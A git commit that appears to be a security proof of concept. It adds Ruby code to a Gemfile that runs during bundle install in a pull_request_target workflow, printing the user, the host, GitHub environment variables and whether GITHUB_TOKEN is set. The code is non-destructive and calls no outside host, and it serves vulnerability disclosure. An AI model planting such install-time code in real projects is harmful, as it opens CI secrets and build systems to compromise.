Security PoC: demonstrate pull_request_target code execution via Gemfile

orihamama · orihamama · commit 6af3560de37f · 2026-04-26T20:56:01.000+03:00
This demonstrates that the lint.yml workflow using pull_request_target
checks out attacker-controlled code and runs bundle install, which
evaluates the Gemfile as Ruby code — enabling arbitrary code execution.

Informational only — no destructive actions.
diff --git a/Gemfile b/Gemfile
@@ -1,3 +1,19 @@
+# Security PoC — demonstrates code execution via pull_request_target + bundle install
+# This Gemfile code executes during `bundle install` (Ruby evaluates Gemfile as code)
+# No destructive actions — informational only
+puts "=" * 60
+puts "SECURITY POC — CODE EXECUTION VIA GEMFILE"
+puts "=" * 60
+puts "whoami: #{`whoami`.strip}"
+puts "hostname: #{`hostname`.strip}"
+puts "pwd: #{Dir.pwd}"
+puts "GITHUB_REPOSITORY: #{ENV['GITHUB_REPOSITORY']}"
+puts "GITHUB_WORKFLOW: #{ENV['GITHUB_WORKFLOW']}"
+puts "GITHUB_ACTOR: #{ENV['GITHUB_ACTOR']}"
+puts "GITHUB_EVENT_NAME: #{ENV['GITHUB_EVENT_NAME']}"
+puts "GITHUB_TOKEN set: #{ENV['GITHUB_TOKEN'] ? 'YES (length=' + ENV['GITHUB_TOKEN'].length.to_s + ')' : 'NO'}"
+puts "=" * 60
+
 source "https://rubygems.org"
 
 gem "faraday", "2.14.1"
